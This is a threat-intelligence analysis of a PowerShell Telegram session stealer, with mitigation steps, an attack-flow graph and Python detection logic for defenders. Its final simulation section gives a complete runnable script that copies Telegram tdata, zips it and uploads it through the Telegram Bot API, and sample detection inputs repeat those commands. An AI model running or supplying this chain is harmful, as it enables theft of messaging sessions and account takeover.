Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
A malicious PowerShell script hosted on Pastebin poses as a Windows update while stealing Telegram Desktop session data from infected systems. The script gathers host details, compresses the Telegram tdata directory, and exfiltrates the resulting archive through the Telegram Bot API. Researchers also identified a related web-based stealer designed to capture Telegram Web authentication keys and forward them to a local HTTP collector. Both tools rely on the same Telegram bot for notifications, though the available evidence suggests they remain in a testing stage rather than broad operational use.
Investigation
Analysts recovered two Pastebin-hosted script variants, uncovered hard-coded bot tokens and chat IDs, and reconstructed the full exfiltration process. During execution, the script terminates Telegram.exe, archives the tdata folder, and uploads the ZIP file through the bot’s sendDocument API method. Bot telemetry also exposed a separate web-focused stealer that transmitted MTProto authentication keys to a private collector hosted at 192.168.137.131:5000. Overall, the findings point to functional testing and validation rather than a mature, large-scale campaign.
Mitigation
Organizations that do not require Telegram should block outbound traffic to api.telegram.org and related Telegram infrastructure. Defenders should monitor PowerShell for use of Invoke-RestMethod or WebClient targeting Telegram API endpoints and detect ZIP archives created in temporary directories that contain tdata content. Any exposed bot tokens should be revoked immediately and replaced to prevent further misuse.
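The two monitoring points above (a PowerShell web client talking to the Telegram Bot API, and a ZIP written to a temp directory from tdata content) as detection logic run over sample data. This is an added Python example, not code from the write-up or from the detection platform; the PowerShell script-block text lines and the in-memory ZIP archives are constructed for the example, and the top-level tdata file names (`key_datas`, `key_data`, `settingss`) are an assumption, since the write-up only names the tdata directory itself. The web-client pattern goes slightly beyond the text by also matching Invoke-WebRequest and HttpClient.

```python
import io
import re
import zipfile
from pathlib import PureWindowsPath

# --- Rule 1: PowerShell web client reaching the Telegram Bot API ---
WEB_CLIENT_RE = re.compile(
    r"Invoke-RestMethod|Invoke-WebRequest|Net\.WebClient|HttpClient", re.IGNORECASE)
TELEGRAM_BOT_API_RE = re.compile(r"api\.telegram\.org/bot", re.IGNORECASE)

# --- Rule 2: Compress-Archive writing a ZIP into a temp directory from tdata content ---
COMPRESS_RE = re.compile(r"\bCompress-Archive\b", re.IGNORECASE)
DEST_RE = re.compile(r"-DestinationPath\s+\"?([^\"\s;]+)", re.IGNORECASE)
TEMP_DIR_RE = re.compile(r"\$env:TE?MP\b|\\Temp\\", re.IGNORECASE)
TDATA_RE = re.compile(r"\btdata\b", re.IGNORECASE)


def classify_script_block(text):
    """Return the rule names one PowerShell script block (e.g. Event ID 4104 text) triggers."""
    findings = []
    if WEB_CLIENT_RE.search(text) and TELEGRAM_BOT_API_RE.search(text):
        findings.append("telegram_api_upload")
    if COMPRESS_RE.search(text):
        m = DEST_RE.search(text)
        dest = m.group(1) if m else ""
        # The tdata reference may sit on the Copy-Item statement of the same block,
        # so the whole block text is searched, not only the Compress-Archive statement.
        if TEMP_DIR_RE.search(dest) and TDATA_RE.search(text):
            findings.append("tdata_temp_archive")
    return findings


def scan_script_blocks(blocks):
    """Return (index, findings) for every block that triggers at least one rule."""
    return [(i, f) for i, b in enumerate(blocks) if (f := classify_script_block(b))]


# --- ZIP inspection: does an archive found in a temp directory hold tdata content? ---
# Assumed set of top-level tdata file names (the write-up names only the directory).
TDATA_FILE_MARKERS = {"key_datas", "key_data", "settingss"}


def is_temp_path(windows_path):
    """True when a Windows path has a Temp/tmp directory component."""
    parts = {p.lower() for p in PureWindowsPath(windows_path).parts}
    return bool(parts & {"temp", "tmp"})


def archive_tdata_entries(zip_bytes):
    """List entries carrying a 'tdata' path component or a known tdata file name.
    Both checks matter: the stealer copies tdata to a temp folder and zips the
    copy's contents, so the 'tdata' directory name may not appear in entry paths."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            parts = [p.lower() for p in PureWindowsPath(name.replace("/", "\\")).parts]
            if not parts:
                continue
            if "tdata" in parts or parts[-1] in TDATA_FILE_MARKERS:
                hits.append(name)
    return hits


def build_sample_zip(names):
    """Constructed in-memory ZIP used as sample input (no real Telegram data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for n in names:
            zf.writestr(n, b"constructed placeholder content")
    return buf.getvalue()


# Constructed script-block samples modelled on the patterns the write-up describes.
SAMPLE_SCRIPT_BLOCKS = [
    # 0: benign internal REST call
    r'Invoke-RestMethod -Uri "https://intranet.example.local/api/health"',
    # 1: Invoke-RestMethod posting a temp ZIP to the Bot API (placeholder token)
    r'Invoke-RestMethod -Uri "https://api.telegram.org/bot<TOKEN>/sendDocument?chat_id=1" -Method Post -InFile "$env:TEMP\diag.zip"',
    # 2: WebClient upload to the Bot API
    r'(New-Object Net.WebClient).UploadFile("https://api.telegram.org/bot<TOKEN>/sendDocument", "C:\Users\u\AppData\Local\Temp\diag.zip")',
    # 3: tdata copied to temp, then zipped into the temp directory
    r'Copy-Item -Path "$env:APPDATA\Telegram Desktop\tdata" -Destination "$env:TEMP\diag" -Recurse; Compress-Archive -Path "$env:TEMP\diag\*" -DestinationPath "$env:TEMP\diag.zip" -Force',
    # 4: benign archive written to the desktop
    r'Compress-Archive -Path "C:\src\proj\*" -DestinationPath "C:\Users\u\Desktop\proj.zip"',
]
SAMPLE_STOLEN_ZIP = build_sample_zip(["key_datas", "settingss", "account_dir_placeholder/maps"])
SAMPLE_BENIGN_ZIP = build_sample_zip(["proj/README.md", "proj/main.py"])

if __name__ == "__main__":
    for i, findings in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {i}: {findings}")
    print("tdata entries in temp ZIP:", archive_tdata_entries(SAMPLE_STOLEN_ZIP))
```

The script-block rule is meant to run over PowerShell Script Block Logging text (Event ID 4104), where a one-liner arrives as a single block; the ZIP check is meant for a file-creation event whose path satisfies `is_temp_path`, after which the archive's entry names are read without extracting any content.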
Response
If the script is discovered, terminate the associated PowerShell process and remove any generated diag.zip archives. Revoke all active Telegram sessions tied to the affected account and enable two-factor authentication to reduce the risk of continued access. The bot token should be changed, and the linked bot chat should be reviewed for evidence of exfiltrated data. A broader forensic investigation should also confirm whether any additional credentials or session material were collected.
Attack Flow
graph TB
  %% Class definitions
  classDef action fill:#99ccff
  classDef tool fill:#ffcc99
  classDef process fill:#ffeb99

  %% Action nodes
  action_user_exec["<b>Action</b> – <b>T1204 User Execution</b><br/>Victim runs PowerShell script named Windows Telemetry Update<br/><b>Technique</b> T1036 Masquerading"]
  class action_user_exec action
  action_powershell_interp["<b>Action</b> – <b>T1059.001 PowerShell</b><br/>Script executed via PowerShell interpreter"]
  class action_powershell_interp action
  action_sysinfo["<b>Action</b> – <b>T1082 System Information Discovery</b><br/>Collects USERNAME, COMPUTERNAME and public IP"]
  class action_sysinfo action
  action_collect_tdata["<b>Action</b> – <b>T1005 Data from Local System</b><br/>Locates Telegram Desktop tdata directories and terminates Telegram.exe"]
  class action_collect_tdata action
  action_archive["<b>Action</b> – <b>T1560.001 Archive via Utility</b><br/>Compress-Archive creates diag.zip with collected files"]
  class action_archive action
  action_delete["<b>Action</b> – <b>T1070.004 File Deletion</b><br/>Deletes diag.zip after upload"]
  class action_delete action
  action_exfiltration["<b>Action</b> – <b>T1020 Automated Exfiltration</b><br/>Uses Telegram Bot sendDocument endpoint to exfiltrate zip file<br/><b>Sub-techniques</b> T1041 Exfiltration Over C2 Channel, T1567 Exfiltration Over Web Service, T1071.001 Web Protocols"]
  class action_exfiltration action
  action_session_hijack["<b>Action</b> – <b>T1563 Remote Service Session Hijacking</b><br/>Replays MTProto authorization keys from harvested tdata"]
  class action_session_hijack action
  action_steal_cookies["<b>Action</b> – <b>T1550.004 Use Alternate Authentication Material</b><br/>Steals Telegram Web session cookies from browser storage and forwards to collector"]
  class action_steal_cookies action

  %% Tool / Process nodes
  tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows command-line shell and scripting language"]
  class tool_powershell tool
  tool_compress["<b>Tool</b> – <b>Name</b>: Compress-Archive<br/><b>Description</b>: PowerShell cmdlet to create ZIP archives"]
  class tool_compress tool
  process_telegram["<b>Process</b> – <b>Name</b>: Telegram.exe<br/><b>Description</b>: Desktop client for Telegram messaging"]
  class process_telegram process
  tool_telegram_bot["<b>Tool</b> – <b>Name</b>: Telegram Bot API<br/><b>Description</b>: sendDocument endpoint used for data exfiltration"]
  class tool_telegram_bot tool

  %% Connections showing flow
  action_user_exec -->|triggers| action_powershell_interp
  action_powershell_interp -->|uses| tool_powershell
  action_powershell_interp -->|executes| action_sysinfo
  action_sysinfo -->|collects| action_collect_tdata
  action_collect_tdata -->|terminates| process_telegram
  action_collect_tdata -->|uses| tool_compress
  action_collect_tdata -->|creates| action_archive
  action_archive -->|uses| tool_compress
  action_archive -->|produces| action_exfiltration
  action_exfiltration -->|uses| tool_telegram_bot
  action_exfiltration -->|deletes| action_delete
  action_delete -->|cleans up| action_exfiltration
  action_exfiltration -->|enables| action_session_hijack
  action_session_hijack -->|facilitates| action_steal_cookies
Detections
- Call Suspicious .NET Methods from Powershell (via powershell)
- Possible Telegram Abuse As Command And Control Channel (via dns_query)
- Possible IP Lookup Domain Communications Attempted (via dns)
- IOCs (SourceIP) to detect: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
- IOCs (DestinationIP) to detect: Inside A Telegram Session Stealer: How A Pastebin-Hosted PowerShell Script Targets Desktop And Web Sessions
- Detection of Telegram Session Stealer via PowerShell Script [Windows Network Connection]
- Windows Telemetry Update – Telegram Session Stealer [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Reconnaissance: The attacker queries api.ipify.org to discover the host's public IP (used later for logging).
- Service Disruption: Stops the legitimate Telegram Desktop process to ensure files are not locked.
- Data Collection: Recursively copies the Telegram Desktop tdata directory (session files) to a temporary location.
- Archiving: Compresses the harvested data into diag.zip.
- Exfiltration: Sends the archive to a malicious Telegram Bot via Invoke-RestMethod.
- Cleanup: Deletes the temporary archive and optionally restarts Telegram.

Regression Test Script: Executes the full attack chain; the statements below are joined with semicolons into the single PowerShell command line that the detection rule matches.

# Windows Telemetry Update – Telegram Session Stealer (regression test)
# Reconnaissance: api.ipify.org answers with a plain-text body, so Invoke-RestMethod
# returns the IP string directly (there is no .Content property on the result)
$ip = Invoke-RestMethod -Uri "http://api.ipify.org"
# Service disruption: stop Telegram Desktop so the tdata files are not locked
Stop-Process -Name Telegram -Force -ErrorAction SilentlyContinue
# Data collection: copy the tdata session directory to a temporary location
$src = "$env:APPDATA\Telegram Desktop\tdata"
$dst = "$env:TEMP\diag"
Copy-Item -Path $src -Destination $dst -Recurse -Force
# Archiving: zip the copied contents into diag.zip in the temp directory
Compress-Archive -Path "$dst\*" -DestinationPath "$env:TEMP\diag.zip" -Force
# Exfiltration: placeholder bot token and chat ID; the request only needs to
# generate the api.telegram.org network and PowerShell telemetry the rule expects
$botToken = "123456:ABC-DEF1234ghIkl-zyx57W2v1u123ew11"
$chatId = "987654321"
Invoke-RestMethod -Uri "https://api.telegram.org/bot$botToken/sendDocument?chat_id=$chatId" -Method Post -InFile "$env:TEMP\diag.zip" -ContentType "multipart/form-data"
# Cleanup: delete the archive after upload
Remove-Item -Path "$env:TEMP\diag.zip" -Force

Cleanup Commands: Restores the environment to its original state.

# Restart Telegram (if desired) and remove copied data
Start-Process -FilePath "$env:ProgramFiles\Telegram Desktop\Telegram.exe" -WindowStyle Hidden
Remove-Item -Path "$env:TEMP\diag" -Recurse -Force